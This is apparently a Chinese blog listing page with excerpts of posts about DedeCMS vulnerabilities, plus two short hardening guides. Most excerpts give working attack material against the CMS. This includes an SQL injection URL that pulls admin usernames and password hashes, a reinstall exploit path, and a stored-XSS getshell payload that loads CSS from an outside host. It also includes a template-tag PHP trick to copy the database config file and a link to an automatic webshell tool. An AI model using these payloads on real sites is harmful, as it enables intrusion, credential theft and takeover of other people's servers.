DedeCMS 20140201 之前的5.7通杀

分类:安全 | 2015-01-28 | 撸过 2,021 次
1人扯谈

无需注册会员账号:

Exp:plus/recommend.php?action=&aid=1&_FILES[type][tmp_name]=\'
or mid=@`\'` /*!50000union*//*!50000select*/1,2,3,(select
CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`
limit+0,1),5,6,7,8,9%23@`\'`+&_FILES[type][name]=1.jpg&_FILES[type]
[type]=application/octet-stream&[......]

继续阅读

dedecms 躺着也中枪 爆重装漏洞

分类:安全 | 2013-06-30 | 撸过 1,870 次
4人扯谈

利用条件:web server: apache
漏洞原因::apache 不认识bak 直接当php执行.

http://webshell.cc/install/index.php.bak?insLockfile=1

dedecms死的太冤枉了. apache的原因.

[通杀]dedecms plus/search.php 注入漏洞利用EXP

分类:安全 | 2013-01-23 | 撸过 3,390 次
5人扯谈

哎。没意识,我一个月前就发现了这个漏洞,一直也没去黑站 放那 现在狗卵的什么 知道创宇 发出来了。郁闷。。可惜了我的洞辛苦看了2天的dedecms漏洞就这样没了。

既然已经发出来了,我就把我自己搞的exp发下吧。。唉。

我一般是这样测试的:

提交

https://webshell.cc/plus/search.php?keyword=as&typeArr[ uNion ]=a

 

看结果如果提示

Safe Alert: Request Error step 2 !

那么直接用下面的exp

https://webshell.cc/pl[......]

继续阅读

dedecms xss 通杀所有版本 dede 5.6 dede 5.7 直接获取webshell

分类:安全 | 2012-02-14 | 撸过 3,263 次
0人扯谈

DEDECMS由于编辑器过滤不严,将导致恶意脚本运行。可getshell取得权限。为什么说它是0Day呢?能getshell的都算0Day(鸡肋发挥起来也能变凤凰)

  目前只是测试过5.3到5.7版本。其他更早的版本大家就自由发挥吧。下面说说利用方法。条件有2个:

  1. 开启注册
  2. 开启投稿

注册会员-发表文章投稿,内容如下填写:

<style>@im\port'\https://webshell.cc/xss.css';</style>

在你自己的网站webshell.cc上新建xss.css内容如下:

body{ background-image:url('jav[......]

继续阅读

DEDECMS安全设置指南

分类:技术 | 2012-01-30 | 撸过 413 次
0人扯谈

   DEDECMS 这名词细想起来,我还是有一份特殊的感情的,当初做网站的时候,最早用的动易CMS2006,后来转PHP后,一直用的DEDECMS,只是现今不在用了而已,可以说,它造就了很多中小站长,是中小站长的福音。

下面就DEDECMS的安全设置,简单记录下。
1、尽量使用纯PHP的主机空间,如果非要使用WINDOWS,最好关闭非所有PHP支持;
2、更改默认的 www.webshell.cc/dede/类管理地址;
3、给默认的admin管理帐号分配没有权限的用户组;
4、data/common.inc.php文件属性(Linux/Unix)设置为644或(Windows NT)设置[......]

继续阅读

dedecms通杀SQL注入

分类:安全 | 2012-01-1 | 撸过 508 次
0人扯谈

# Dede Cms All Versions Sql Vulnerability Exploit
# </ No Priv8 , Everything is Public >
# Date: 30/12/2011 - 13:00
# Author: [ CWH ] | Finded By : Nafsh
# We Are : Mr.M4st3r , Nafsh , Skote_Vahshat , HijaX
# Support: Cyberwh.org
# Mail: Nafsh@live.com
# Software Website: http://www.dedecms.[......]

继续阅读

dedecms 5.7 - 游客无限刷顶踩数值

分类:安全 | 2011-12-30 | 撸过 467 次
0人扯谈

只测试了DEDECMS V5.7系统,之前的版本估计也一样。

在官方地址进行的简单测试,应该算是一个小BUG,利用这个可以无限的刷某篇文章的顶/踩 数值。

详细说明:虽然前端页面做了 游客 只能提交一次的限制,但是直接以URL访问则没有限制,只要按着F5不放,一会就能上百上千。。。。

而且dede的官方也木有做这方面的限制。。。你懂的

漏洞证明:http://www.dedecms.com/plus/feedback.php?aid=1102&action=bad&fid=1102

http://www.dedecms.com/news/2011/1201/1102.[......]

继续阅读

dedecms程序六个安全措施

分类:技术 | 2011-12-6 | 撸过 906 次
0人扯谈

近期,有部分无聊人士喜欢利用0day 找到程序的漏洞上传流量攻击脚本,让人很头疼。目前发现的99%是dedecms程序漏洞,如果您正在使用dedecms程序,请看下面的几个步骤。

1.在dedecms的后台更新补丁,尽可能升级为最新版本。

2.data、templets、uploads、install这几个目录去掉写的权限 。

3.如果只是使用文章系统并没有使用会员功能,则强推推荐:关闭会员功能、关闭新会员注册、直接删除member目录或改名。

4.用dedecms后台的“系统”中的文件校验和病毒扫描功能 查杀病毒木马。

5.检查有无/data/cache/t.php 、/data/[......]

继续阅读

dede0day 利用小技巧

分类:安全 | 2011-11-18 | 撸过 363 次
0人扯谈

By:zafe

遇到可写不可执行的,可执行不可写的站的也许用的上

{dede:php}copy('../data/common.inc.php','../data/cache/test.txt');{/dede:php}

然后去xxx.com/data/cache/test.txt看数据库信息,如果是root那就happy吧

如果是普通用户,首先看下有哪些数据库:

//自行把{dede:php}{/dede:php}之间的内容替换成下面的,结果都是到data/cache/test.txt去看

$xdb = mysql_connect("localhost","[......]

继续阅读

dedecms全自动获取WEBSHELL

分类:工具 | 2011-10-14 | 撸过 887 次
2人扯谈

很好很给力,上图:

 

下载:dede

第 1 页,共 2 页12